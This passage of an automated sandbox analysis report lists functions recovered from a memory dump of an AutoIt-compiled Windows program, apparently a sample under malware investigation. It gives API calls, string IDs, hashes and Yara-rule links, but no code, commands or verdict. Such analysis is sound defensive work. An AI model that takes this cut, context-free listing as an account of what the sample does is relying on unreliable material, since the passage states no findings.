                                            • GetMenuItemInfoW.USER32 ref: 0135E877
                                            • GetMenuItemCount.USER32 ref: 0135E90B
                                            • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 0135E99F
                                            • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 0135E9A8
                                            • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 0135E9B1
                                            • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 0135E9BA
                                            • GetMenuItemCount.USER32 ref: 0135E9C3
                                            • SetMenuItemInfoW.USER32 ref: 0135E9FB
                                            • GetCursorPos.USER32(?,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 0135EA05
                                            • SetForegroundWindow.USER32(?,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 0135EA0F
                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 0135EA25
                                            • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 0135EA32
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                            • String ID: 0
                                            • API String ID: 3993528054-4108050209
                                            • Opcode ID: aa94738ccaa6c151f4374c7179bf72614f833c5e6eef2e7e394f6258b9b5ba53
                                            • Instruction ID: 2b953772660e79602af1c1b587fa48ddbaeb6f9d1e32579e34b7fd26a6687bb4
                                            • Opcode Fuzzy Hash: aa94738ccaa6c151f4374c7179bf72614f833c5e6eef2e7e394f6258b9b5ba53
                                            • Instruction Fuzzy Hash: 3671B171644305BBF730CB68CC45F5AFBA8AF45B38F24471AFAA56B2C0C7B4A9408B51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012F2190, Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 202COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 012F1D10: _wcslen.LIBCMT ref: 012F1D11
                                              • Part of subcall function 012F1D10: _memmove.LIBCMT ref: 012F1D57
                                            • __wcsicoll.LIBCMT ref: 012F2262
                                            • __wcsicoll.LIBCMT ref: 012F2278
                                            • __wcsicoll.LIBCMT ref: 012F228E
                                              • Part of subcall function 013013CB: __wcsicmp_l.LIBCMT ref: 0130144B
                                            • __wcsicoll.LIBCMT ref: 012F22A4
                                            • _wcscpy.LIBCMT ref: 012F22C4
                                            • GetModuleFileNameW.KERNEL32(00000000,C:\84086963\fqficjon.emu,00000104), ref: 01318AD6
                                            • _wcscpy.LIBCMT ref: 01318B29
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: __wcsicoll$_wcscpy$FileModuleName__wcsicmp_l_memmove_wcslen
                                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\84086963\fqficjon.emu$CMDLINE$CMDLINERAW
                                            • API String ID: 574121520-2623719339
                                            • Opcode ID: 07e7f7c29b56cf61b9cbd36e7a5ee0a14ff8610b4bef81950e4089dbc63c8fed
                                            • Instruction ID: 818f6263357186debacc6861866a6247e6f9ea9ca82bf09bde9eeaf5ffcf7549
                                            • Opcode Fuzzy Hash: 07e7f7c29b56cf61b9cbd36e7a5ee0a14ff8610b4bef81950e4089dbc63c8fed
                                            • Instruction Fuzzy Hash: 51713E71D2021FDBDF14EBA4D851AEEBB74AF64348F40443CDA0577284EBB1A949CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01357BBF, Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 227windowsleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 01357BDD
                                            • GetMenuItemInfoW.USER32 ref: 01357C43
                                            • SetMenuItemInfoW.USER32 ref: 01357C7C
                                            • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 01357C8E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: InfoItemMenu$Sleep_memset
                                            • String ID: 0
                                            • API String ID: 1504565804-4108050209
                                            • Opcode ID: 8407413d0cd0a2eb5819133de5d91a243f9d9d79ee72099fc93779d65b442a47
                                            • Instruction ID: f34ad3990d776406dc9dec97cbc7e9d3e2687ab08c948580cc1b397fe08753cf
                                            • Opcode Fuzzy Hash: 8407413d0cd0a2eb5819133de5d91a243f9d9d79ee72099fc93779d65b442a47
                                            • Instruction Fuzzy Hash: ED71E472500248ABDB30DF58EC88FAFBBA9FB81718F50855AFE0597181D771A941CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013505C5, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,01317F37,?,0000138C,?,00000001,?,?,?), ref: 013505F5
                                            • LoadStringW.USER32(00000000,?,01317F37,?), ref: 013505FC
                                              • Part of subcall function 012F1D10: _wcslen.LIBCMT ref: 012F1D11
                                              • Part of subcall function 012F1D10: _memmove.LIBCMT ref: 012F1D57
                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,01317F37,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 0135061C
                                            • LoadStringW.USER32(00000000,?,01317F37,?), ref: 01350623
                                            • __swprintf.LIBCMT ref: 01350661
                                            • __swprintf.LIBCMT ref: 01350679
                                            • _wprintf.LIBCMT ref: 0135072D
                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 01350746
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                            • API String ID: 3631882475-2268648507
                                            • Opcode ID: e2d31ebc1fc0f09a98b434e85908216b99edb8f7a76747835c50060df4ad812d
                                            • Instruction ID: 9487bd5f7ea8f4a51aa1c8b1fa36c2abeae6245e208e4e9aeb40153a6f3ccc65
                                            • Opcode Fuzzy Hash: e2d31ebc1fc0f09a98b434e85908216b99edb8f7a76747835c50060df4ad812d
                                            • Instruction Fuzzy Hash: EB419E7291020AABDB14FBA4DC84DFEB77CEF54765F504029FA0577180DA71AA45CBB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0134E724, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0134E76C
                                              • Part of subcall function 012F1D10: _wcslen.LIBCMT ref: 012F1D11
                                              • Part of subcall function 012F1D10: _memmove.LIBCMT ref: 012F1D57
                                            • LoadStringW.USER32(?,?,?,00000FFF), ref: 0134E78D
                                            • __swprintf.LIBCMT ref: 0134E7E4
                                            • _wprintf.LIBCMT ref: 0134E8A0
                                            • _wprintf.LIBCMT ref: 0134E8C4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                            • API String ID: 2295938435-2354261254
                                            • Opcode ID: 1de83aa6eb15f8b66a33765abfda8d329162a59bb49c6ff925200e93e95e1081
                                            • Instruction ID: 493c01db4f55ad61891cbf31070e526452cf64ace3b0b3b58c1282215eb2539f
                                            • Opcode Fuzzy Hash: 1de83aa6eb15f8b66a33765abfda8d329162a59bb49c6ff925200e93e95e1081
                                            • Instruction Fuzzy Hash: F351707192021AABEB24EFA4CC80DFFB7B9FF54754F504139E60467284DA74AE45CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01343126, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: __swprintf_wcscpy$__i64tow__itow
                                            • String ID: %.15g$0x%p$False$True
                                            • API String ID: 3038501623-2263619337
                                            • Opcode ID: bdece7de5c71376cf838467033da4a5044fb92bf32cd4fa2f770c6e50a76b1ca
                                            • Instruction ID: 580a835be4449c55b67aef3b203fbed352609f05725f31e739d5c40b314df78b
                                            • Opcode Fuzzy Hash: bdece7de5c71376cf838467033da4a5044fb92bf32cd4fa2f770c6e50a76b1ca
                                            • Instruction Fuzzy Hash: 8F41FC729001259BE710EB78DC81F7AB3F8FF55314F0445B9DA09DB244E635E918C792
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0134E525, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0134E56D
                                              • Part of subcall function 012F1D10: _wcslen.LIBCMT ref: 012F1D11
                                              • Part of subcall function 012F1D10: _memmove.LIBCMT ref: 012F1D57
                                            • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0134E58C
                                            • __swprintf.LIBCMT ref: 0134E5E3
                                            • _wprintf.LIBCMT ref: 0134E690
                                            • _wprintf.LIBCMT ref: 0134E6B4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                            • API String ID: 2295938435-8599901
                                            • Opcode ID: 67e1a889b0279ab25acc5c424c2c3f37e368974adbdf5054b533fb93a8461a24
                                            • Instruction ID: 68e75fbf923a3a76a6d834a184658b61be8c53beb02376e9dc9613998b5b50c4
                                            • Opcode Fuzzy Hash: 67e1a889b0279ab25acc5c424c2c3f37e368974adbdf5054b533fb93a8461a24
                                            • Instruction Fuzzy Hash: 7C518371D1020A9BDB24EFA4D880DFFB7B9EF54354F608079EA1577240EA74AE05CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0134268F, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 147COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: __fread_nolock$_fseek_wcscpy
                                            • String ID: FILE
                                            • API String ID: 3888824918-3121273764
                                            • Opcode ID: bbff0ec60fcd177878e4bffcb3069e8d7402b6806b08317b8611ecb0f0d4b9c7
                                            • Instruction ID: d77918cc498661e092ef7a5a5bb8c4351da3c42961c950f579d40b98ce0b9a9c
                                            • Opcode Fuzzy Hash: bbff0ec60fcd177878e4bffcb3069e8d7402b6806b08317b8611ecb0f0d4b9c7
                                            • Instruction Fuzzy Hash: 2241A9B2910205B7DB24DBA8DC91FEF73F9AF98704F004559FA04A7180E6B5A744CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01343F89, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0131818B,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 01343FAE
                                            • LoadStringW.USER32(00000000), ref: 01343FB5
                                              • Part of subcall function 012F1D10: _wcslen.LIBCMT ref: 012F1D11
                                              • Part of subcall function 012F1D10: _memmove.LIBCMT ref: 012F1D57
                                            • _wprintf.LIBCMT ref: 01343FE9
                                            • __swprintf.LIBCMT ref: 01344018
                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 01344084
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                            • API String ID: 455036304-4153970271
                                            • Opcode ID: e5e69329dfba62fc67f7d94204aa52b3857d65c71e67b046f71e7c2c943c7766
                                            • Instruction ID: 8df1726c63686ba2158574a63f758a3b1be814c9f67f1cf06adc392e35a04dfd
                                            • Opcode Fuzzy Hash: e5e69329dfba62fc67f7d94204aa52b3857d65c71e67b046f71e7c2c943c7766
                                            • Instruction Fuzzy Hash: 9431D172B1020AABDB15FE94DC45DEFB3B8EB98615F404069FA0467280D671AD15CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01356DDB, Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                                            Download Yara Rule
                                            APIs
                                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 01356EB0
                                            • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 01356F29
                                            • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 01356FBE
                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 01356FEA
                                            • _memmove.LIBCMT ref: 01357005
                                            • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 0135700E
                                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 0135702B
                                            • _memmove.LIBCMT ref: 013570B9
                                            • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 0135710E
                                            • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 013570F8
                                              • Part of subcall function 013014F7: std::exception::exception.LIBCMT ref: 01301546
                                              • Part of subcall function 013014F7: std::exception::exception.LIBCMT ref: 01301560
                                              • Part of subcall function 013014F7: __CxxThrowException@8.LIBCMT ref: 01301571
                                            • SafeArrayUnaccessData.OLEAUT32(01369A0A), ref: 01356F95
                                              • Part of subcall function 013014F7: _malloc.LIBCMT ref: 01301511
                                            • SafeArrayUnaccessData.OLEAUT32(01369A0A), ref: 0135717D
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                            • String ID:
                                            • API String ID: 2170234536-0
                                            • Opcode ID: b11b6c8556325be6ef545fd25b3a416906f079cbac282f1d722be80af393de7a
                                            • Instruction ID: e7f0d7135f88f7b6961501740f0b620980c9d8f23234bd4dcfb6fc3337099090
                                            • Opcode Fuzzy Hash: b11b6c8556325be6ef545fd25b3a416906f079cbac282f1d722be80af393de7a
                                            • Instruction Fuzzy Hash: 06B115B56002059FD750CF58C884FBABBBAFF88708F548069EE499B350D736E945CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0136931C, Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,013695B7), ref: 0136933A
                                            • SafeArrayAllocData.OLEAUT32(013695B7), ref: 01369389
                                            • VariantInit.OLEAUT32(?), ref: 0136939B
                                            • SafeArrayAccessData.OLEAUT32(013695B7,?), ref: 013693BC
                                            • VariantCopy.OLEAUT32(?,?), ref: 0136941B
                                            • SafeArrayUnaccessData.OLEAUT32(013695B7), ref: 0136942E
                                            • VariantClear.OLEAUT32(?), ref: 01369443
                                            • SafeArrayDestroyData.OLEAUT32(013695B7), ref: 01369468
                                            • SafeArrayDestroyDescriptor.OLEAUT32(013695B7), ref: 01369472
                                            • VariantClear.OLEAUT32(?), ref: 01369484
                                            • SafeArrayDestroyDescriptor.OLEAUT32(013695B7), ref: 013694A1
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                            • String ID:
                                            • API String ID: 2706829360-0
                                            • Opcode ID: 2fb23b39cb7c08b3c11379c947a2a375f5ece1e904d4acb0ecb9d30e1cbab971
                                            • Instruction ID: 028c97d82ce3c7441bac5d1c2a380252a7b63cd3e4686a30990797bd12cf3c2b
                                            • Opcode Fuzzy Hash: 2fb23b39cb7c08b3c11379c947a2a375f5ece1e904d4acb0ecb9d30e1cbab971
                                            • Instruction Fuzzy Hash: 59512E76A10219AFCB10DFA4D9849EEBBBDFF48308F50856DEA05A7204D731DA45CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01344262, Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 271libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AddressProc_free_malloc$_strlen
                                            • String ID: AU3_FreeVar
                                            • API String ID: 3358881862-771828931
                                            • Opcode ID: 2ff5ad1f8496e70255fa31d5271d2319dcb4d65a4f3a8532735c0e54d519215f
                                            • Instruction ID: 705448c1f8257d5801d0fff52ede624f9c0b196dcbc1e721ff25adcc51f772f6
                                            • Opcode Fuzzy Hash: 2ff5ad1f8496e70255fa31d5271d2319dcb4d65a4f3a8532735c0e54d519215f
                                            • Instruction Fuzzy Hash: 50B17DB4A0020ADFDB10DF58C884A6AB7F5FF88318F1485A9E9558B352D735F951CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0134FB23, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 147windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 0134FB72
                                            • GetMenuItemInfoW.USER32 ref: 0134FBBF
                                            • IsMenu.USER32 ref: 0134FBD6
                                            • CreatePopupMenu.USER32(00000000,?,770C33D0), ref: 0134FC0E
                                            • GetMenuItemCount.USER32 ref: 0134FC74
                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0134FC9D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                            • String ID: 0$2
                                            • API String ID: 3311875123-3793063076
                                            • Opcode ID: ee44c2425f6287ad8769cc75e92ec6bc4264cb6cba3f530e4c50e1a612c1fbcb
                                            • Instruction ID: 724a6ee63e8f5a25325b9b89f86b61e3c8e1758cd6981eaeb2884e6f6656f47a
                                            • Opcode Fuzzy Hash: ee44c2425f6287ad8769cc75e92ec6bc4264cb6cba3f530e4c50e1a612c1fbcb
                                            • Instruction Fuzzy Hash: BB519471A002099BDF20DF6CD884BAEBBECEF45328F18851DED65D7281D370A844CBA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012F1E00, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 118windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadStringW.USER32(?,00000065,?,0000007F), ref: 01317AB3
                                              • Part of subcall function 012F2390: _wcslen.LIBCMT ref: 012F239D
                                              • Part of subcall function 012F2390: _memmove.LIBCMT ref: 012F23C3
                                            • _memset.LIBCMT ref: 012F1E90
                                            • _wcsncpy.LIBCMT ref: 012F1ED2
                                            • _wcscpy.LIBCMT ref: 012F1EF1
                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 012F1F03
                                            • __swprintf.LIBCMT ref: 01317B2D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.614425464.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                                            • Associated: 00000004.00000002.614350039.00000000012F0000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.614968855.0000000001372000.00000002.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615066018.0000000001380000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615149179.0000000001381000.00000008.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615161432.0000000001382000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615199681.0000000001397000.00000004.00020000.sdmp Download File
                                            • Associated: 00000004.00000002.615231296.000000000139B000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy_wcslen_wcsncpy
                                            • String ID: Line %d: $AutoIt -
                                            • API String ID: 1629950421-4094128768
                                            • Opcode ID: 4fac23727ac17a85412189e77628cc65a560d50e711067e83405c19e72e0b87d
                                            • Instruction ID: c6fd30292279de9bc622ee8874adf919c118a9f85db9548b9d834fe51442326f
                                            • Opcode Fuzzy Hash: 4fac23727ac17a85412189e77628cc65a560d50e711067e83405c19e72e0b87d
                                            • Instruction Fuzzy Hash: DD41C4725283469BD320FB24D844FAFB7E9BF94318F44092DF689931C4E775A608C792
